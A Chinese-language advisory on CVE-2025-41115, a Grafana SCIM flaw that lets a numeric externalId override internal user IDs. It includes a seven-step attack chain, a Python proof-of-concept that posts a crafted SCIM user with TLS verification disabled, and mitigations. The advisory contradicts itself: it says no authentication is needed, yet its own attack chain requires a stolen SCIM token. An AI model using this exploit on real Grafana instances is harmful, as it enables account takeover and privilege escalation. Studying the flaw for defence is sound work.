CVE-2025-41115 Grafana SCIM配置漏洞导致身份冒充与权限提升

漏洞信息

漏洞编号

CVE-2025-41115

漏洞类型

身份验证绕过

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Grafana Enterprise, Grafana Cloud

漏洞概述

CVE-2025-41115是Grafana 12.x版本中的一个严重安全漏洞，位于SCIM（跨域身份管理系统）配置功能中。SCIM provisioning功能于2025年4月在Grafana Enterprise和Grafana Cloud中引入，旨在改善组织在Grafana中管理用户和团队的方式，实现自动化的用户生命周期管理。然而，该功能在用户身份处理机制上存在严重缺陷，允许恶意或被攻陷的SCIM客户端配置具有数字externalId的用户，进而可能覆盖内部用户ID，导致严重的身份冒充和权限提升风险。攻击者无需任何认证即可利用此漏洞，对系统机密性、完整性和可用性造成严重影响。

技术细节

漏洞根源在于Grafana的SCIM provisioning模块对用户externalId的验证不足。当enableSCIM功能标志启用且user_sync_enabled配置选项设置为true时，系统会接受SCIM客户端提供的任意数字型externalId。由于Grafana内部使用数字ID来标识用户，攻击者可以通过构造特定的SCIM请求，将externalId设置为目标用户的内部ID值，从而实现对该用户帐号的完全控制。具体利用方式为：攻击者首先获取目标用户在Grafana系统中的内部数字ID，然后通过SCIM API使用该数字ID作为externalId创建或更新用户条目。系统将这个外部ID与内部ID进行关联，使得攻击者可以冒充目标用户执行任意操作，包括访问敏感数据、修改配置或提升权限。

攻击链分析

STEP 1

步骤1

收集情报：攻击者识别目标Grafana实例，确认SCIM provisioning功能已启用（enableSCIM=true且user_sync_enabled=true）

STEP 2

步骤2

获取访问权限：攻击者获取有效的SCIM API令牌（通过窃取或利用配置不当的SCIM客户端）

STEP 3

步骤3

枚举目标用户：攻击者通过SCIM API查询用户列表或通过其他途径获取目标用户的内部数字ID

STEP 4

步骤4

构造恶意请求：攻击者构造SCIM用户创建/更新请求，将externalId字段设置为目标用户的内部数字ID

STEP 5

步骤5

执行ID覆盖：发送恶意SCIM请求，Grafana将攻击者提供的用户与目标用户的内部ID关联

STEP 6

步骤6

身份冒充：攻击者使用创建的帐号登录，由于ID关联，系统将其识别为目标用户，从而获得目标用户的所有权限

STEP 7

步骤7

权限提升与数据窃取：攻击者以目标用户身份执行操作，包括访问敏感数据、修改系统配置或提升自身权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-41115 PoC - Grafana SCIM User ID Override import requests import json import sys # Configuration GRAFANA_URL = "https://your-grafana-instance.com" SCIM_TOKEN = "your-scim-bearer-token" TARGET_USER_INTERNAL_ID = 123 # Target user's internal numeric ID def create_malicious_user(): """Create a user with malicious externalId to override internal user ID""" headers = { "Authorization": f"Bearer {SCIM_TOKEN}", "Content-Type": "application/scim+json" } # Malicious SCIM user creation with internal ID as externalId payload = { "schemas": ["urn:ietf:params:scim:schemas:core:2.0:User"], "userName": "[email protected]", "name": { "givenName": "Attacker", "familyName": "User" }, "emails": [{ "value": "[email protected]", "primary": True }], "externalId": str(TARGET_USER_INTERNAL_ID), "active": True } try: response = requests.post( f"{GRAFANA_URL}/api/scim/v2/Users", headers=headers, json=payload, verify=False, timeout=30 ) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {json.dumps(response.json(), indent=2)}") if response.status_code in [200, 201]: print("[+] User created successfully - internal ID override possible!") return True else: print("[-] Failed to create user") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("[*] CVE-2025-41115 PoC - Grafana SCIM User ID Override") print("[*] Target: Grafana Enterprise/Cloud 12.x with SCIM enabled") create_malicious_user()

影响范围

Grafana Enterprise 12.x (SCIM enabled)

Grafana Cloud (SCIM enabled)

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Grafana配置中禁用SCIM provisioning功能（设置enableSCIM=false或删除SCIM相关配置）；2) 禁用user_sync_enabled选项（设置为false）；3) 限制SCIM API端点的网络访问，仅允许受信任的IP地址访问；4) 实施额外的身份验证层，如API密钥轮换和请求签名验证；5) 加强SCIM令牌的存储和传输安全。